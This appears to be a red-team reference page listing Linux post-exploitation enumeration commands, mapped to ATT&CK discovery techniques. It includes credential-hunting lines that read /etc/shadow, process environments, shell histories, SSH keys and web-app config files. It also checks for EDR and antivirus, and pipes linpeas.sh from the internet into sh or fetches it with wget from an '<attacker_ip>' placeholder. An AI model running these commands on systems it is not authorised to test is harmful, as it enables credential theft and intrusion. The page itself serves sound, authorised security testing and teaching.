Linux Enumeration
Overview
Linux post-exploitation enumeration maps the system after gaining initial access. The goal is to understand user context, system configuration, network position, and identify privilege escalation paths. Most commands use standard system utilities available on any Linux distribution — no tools to transfer.
ATT&CK Mapping
- Tactic: TA0007 - Discovery
- Technique: T1082 - System Information Discovery
- Technique: T1033 - System Owner/User Discovery
- Technique: T1016 - System Network Configuration Discovery
- Technique: T1049 - System Network Connections Discovery
- Technique: T1057 - Process Discovery
- Technique: T1083 - File and Directory Discovery
- Technique: T1087.001 - Account Discovery: Local Account
- Technique: T1518 - Software Discovery
Prerequisites
- Shell access on target Linux system (reverse shell, SSH, web shell)
- For automated enumeration: ability to transfer scripts (linpeas.sh)
Techniques
Situational Awareness
# Current user and privileges
id
whoami
groups
# Hostname and OS info
hostname
uname -a
cat /etc/os-release
cat /etc/issue
# Kernel version (for kernel exploit research)
uname -r
# Architecture
uname -m
# System uptime and logged-in users
uptime
w
who
last -a | head -20
User and Group Enumeration
# All local users
cat /etc/passwd
# Users with login shells
grep -v '/nologin\|/false' /etc/passwd
# Users with UID 0 (root equivalents)
awk -F: '$3 == 0 {print $1}' /etc/passwd
# Check if /etc/shadow is readable
cat /etc/shadow 2>/dev/null
# Local groups
cat /etc/group
# Sudo privileges for current user
sudo -l 2>/dev/null
# Check for other sudoers
cat /etc/sudoers 2>/dev/null
ls -la /etc/sudoers.d/ 2>/dev/null
Network Configuration
# Network interfaces and IP addresses
ip a
ifconfig 2>/dev/null
# Routing table
ip route
route -n 2>/dev/null
# DNS configuration
cat /etc/resolv.conf
# Hosts file (may reveal internal hostnames)
cat /etc/hosts
# ARP cache (reveals other hosts on the network)
ip neigh
arp -a 2>/dev/null
# Listening ports and established connections
ss -tlnp
ss -tunap
netstat -tlnp 2>/dev/null
netstat -anp 2>/dev/null
# Firewall rules
iptables -L -n 2>/dev/null
cat /etc/iptables/rules.v4 2>/dev/null
nft list ruleset 2>/dev/null
Process Enumeration
# Running processes (all users)
ps aux
ps -ef
# Process tree
ps auxf
# Processes running as root (potential targets)
ps aux | grep '^root'
# Check for interesting processes
ps aux | grep -iE 'docker|mysql|postgres|mongo|apache|nginx|tomcat|redis'
Installed Software
# Debian/Ubuntu
dpkg -l 2>/dev/null
# RHEL/CentOS/Fedora
rpm -qa 2>/dev/null
# Check PATH for custom binaries
echo $PATH
# Find installed compilers (useful for kernel exploits)
which gcc cc g++ 2>/dev/null
# Find interpreters
which python python3 perl ruby 2>/dev/null
# Package manager history (recent installs)
cat /var/log/dpkg.log 2>/dev/null | tail -20
cat /var/log/yum.log 2>/dev/null | tail -20
Scheduled Tasks
# Current user crontab
crontab -l 2>/dev/null
# System crontabs
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/
# Systemd timers
systemctl list-timers --all 2>/dev/null
# Look for writable cron scripts
find /etc/cron* -writable -type f 2>/dev/null
File System Enumeration
# SUID binaries (potential privesc)
find / -perm -4000 -type f 2>/dev/null
# SGID binaries
find / -perm -2000 -type f 2>/dev/null
# World-writable directories
find / -writable -type d 2>/dev/null
# World-writable files (excluding /proc and /sys)
find / -writable -type f ! -path '/proc/*' ! -path '/sys/*' 2>/dev/null
# Files owned by current user
find / -user $(whoami) -type f 2>/dev/null
# Recently modified files (last 10 minutes)
find / -mmin -10 -type f 2>/dev/null
# Capabilities set on binaries
getcap -r / 2>/dev/null
# Mounted filesystems
mount
df -h
cat /etc/fstab
Credential Hunting
# SSH keys
find / -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "authorized_keys" 2>/dev/null
ls -la ~/.ssh/ 2>/dev/null
# History files
cat ~/.bash_history 2>/dev/null
cat ~/.zsh_history 2>/dev/null
cat ~/.mysql_history 2>/dev/null
# Configuration files with credentials
find / -name "*.conf" -o -name "*.config" -o -name "*.cfg" -o -name "*.ini" 2>/dev/null | head -30
grep -rl "password" /etc/ 2>/dev/null
grep -rl "password" /var/www/ 2>/dev/null
grep -rl "password" /opt/ 2>/dev/null
# Environment variables
env
cat /proc/*/environ 2>/dev/null
# Web application config files
cat /var/www/html/wp-config.php 2>/dev/null
cat /var/www/html/.env 2>/dev/null
find /var/www/ -name "*.php" -exec grep -l "password\|passwd\|db_pass" {} \; 2>/dev/null
# Database files
find / -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" 2>/dev/null
Defense Posture
# Check for AV/EDR
which clamd clamscan 2>/dev/null
ps aux | grep -iE 'falcon|crowd|sentinel|sophos|eset|clam|avg'
# AppArmor status
aa-status 2>/dev/null
# SELinux status
getenforce 2>/dev/null
sestatus 2>/dev/null
# Check if we're in a container
cat /proc/1/cgroup 2>/dev/null | grep -i docker
ls /.dockerenv 2>/dev/null
cat /proc/1/cgroup 2>/dev/null | grep -i lxc
# Check for audit daemon
ps aux | grep auditd
cat /etc/audit/auditd.conf 2>/dev/null
Automated Enumeration
# linpeas.sh
# https://github.com/peass-ng/PEASS-ng
# Transfer to target and run
curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or download first, then transfer
# On attacker: python3 -m http.server 8080
# On target:
wget http://<attacker_ip>:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# Save output to file
./linpeas.sh | tee linpeas_output.txt
# Run specific checks only
./linpeas.sh -s # stealth & faster (skips time-consuming checks)
./linpeas.sh -e # extra enumeration (takes longer)
linpeas.sh checks for SUID binaries, capabilities, sudo misconfigurations, writable paths, credential files, kernel exploits, container breakouts, and hundreds of other privilege escalation vectors. On Kali, the script is available at /usr/share/peass/linpeas/linpeas.sh.